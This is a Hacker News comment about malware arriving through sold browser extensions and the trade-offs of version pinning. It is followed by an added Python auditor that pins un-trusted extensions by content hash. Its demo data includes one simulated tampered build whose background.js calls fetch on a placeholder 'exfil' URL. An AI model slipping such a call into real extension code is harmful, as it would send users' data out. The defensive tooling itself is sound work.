Hacker News
by siegecraft 3262 days ago
Yes, this is the major issue. Authors also can sell their extension, then re-publish their own non-malwared version as an alternative, then just keep doing it over and over again.

I wrote some scripts to provide version pinning (just automates the manual editing of the manifests), but then you have to consider critical vulnerabilities in things like the LastPass extension, where you absolutely want updates ASAP. So then you either have to have a curated extension list, or maybe just separate extensions into "trusted", i.e. provided by reputable businesses as part of their product (LastPass, Okta, etc.), and "un-trusted." Even then, if the malware isn't in your face, you have no idea if the pinned version of your un-trusted extensions is actually non-malicious without auditing the code.
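An added example of the trusted/un-trusted split described in the comment above; it is not the commenter's script or any browser vendor's code. It assumes unpacked extensions live under one directory, one subdirectory per extension id, each with a `manifest.json`. Un-trusted extensions are pinned by version and by a SHA-256 over their files (so a re-published build with the same version string is still caught), while ids in the `trusted` set are allowed to update freely. The three sample extensions and their contents are constructed inline for the demo.

```python
"""Added example (not from the HN thread): audit unpacked browser extensions
against a pin list, letting 'trusted' ones update freely and flagging any
'un-trusted' one whose version or file contents differ from the pin."""
import hashlib
import json
import os
import tempfile


def hash_extension_dir(path):
    """SHA-256 over every file's relative path and contents, in sorted order,
    so a pinned extension is identified by its code, not just by its version."""
    h = hashlib.sha256()
    for root, dirs, files in os.walk(path):
        dirs.sort()  # deterministic traversal order
        for name in sorted(files):
            full = os.path.join(root, name)
            rel = os.path.relpath(full, path).replace(os.sep, "/")
            h.update(rel.encode() + b"\0")
            with open(full, "rb") as f:
                h.update(f.read())
            h.update(b"\0")
    return h.hexdigest()


def read_manifest(path):
    with open(os.path.join(path, "manifest.json"), encoding="utf-8") as f:
        return json.load(f)


def check_extensions(ext_root, pins, trusted):
    """Return {extension_id: status}.

    pins:    {id: {"version": str, "sha256": str}} for un-trusted extensions.
    trusted: set of ids allowed to update freely (reputable vendor products).
    Status is one of 'trusted', 'pinned-ok', 'changed', 'unpinned'."""
    results = {}
    for ext_id in sorted(os.listdir(ext_root)):
        path = os.path.join(ext_root, ext_id)
        if not os.path.isfile(os.path.join(path, "manifest.json")):
            continue
        version = read_manifest(path).get("version")
        if ext_id in trusted:
            results[ext_id] = "trusted"
            continue
        pin = pins.get(ext_id)
        if pin is None:
            results[ext_id] = "unpinned"
        elif pin["version"] == version and pin["sha256"] == hash_extension_dir(path):
            results[ext_id] = "pinned-ok"
        else:
            results[ext_id] = "changed"
    return results


def _write_ext(root, ext_id, version, script):
    """Write a minimal fake extension (constructed sample data)."""
    path = os.path.join(root, ext_id)
    os.makedirs(path, exist_ok=True)
    with open(os.path.join(path, "manifest.json"), "w", encoding="utf-8") as f:
        json.dump({"manifest_version": 2, "name": ext_id, "version": version}, f)
    with open(os.path.join(path, "background.js"), "w", encoding="utf-8") as f:
        f.write(script)
    return path


def demo():
    """Constructed scenario: one trusted vendor extension, one pinned and
    unchanged, one pinned but silently replaced under the same version,
    and one with no pin at all."""
    root = tempfile.mkdtemp()
    _write_ext(root, "pwmanager", "4.1.0", "console.log('vendor product');")
    good = _write_ext(root, "goodtool", "1.2.0", "console.log('hello');")
    sketchy = _write_ext(root, "sketchy", "0.9.0", "console.log('benign');")
    pins = {
        "goodtool": {"version": "1.2.0", "sha256": hash_extension_dir(good)},
        "sketchy": {"version": "0.9.0", "sha256": hash_extension_dir(sketchy)},
    }
    # Simulate a swapped-out build: same version string, different code.
    _write_ext(root, "sketchy", "0.9.0", "fetch('https://example.invalid/exfil');")
    _write_ext(root, "newcomer", "0.1.0", "console.log('new');")
    return check_extensions(root, pins, trusted={"pwmanager"})


if __name__ == "__main__":
    for ext_id, status in demo().items():
        print(f"{ext_id}: {status}")
```

The content hash is what makes the pin meaningful: a version-only pin tells you nothing if the store-side package changes while the manifest version stays the same. A `changed` or `unpinned` result is a prompt to audit, not proof of malice, which is the caveat the comment ends on.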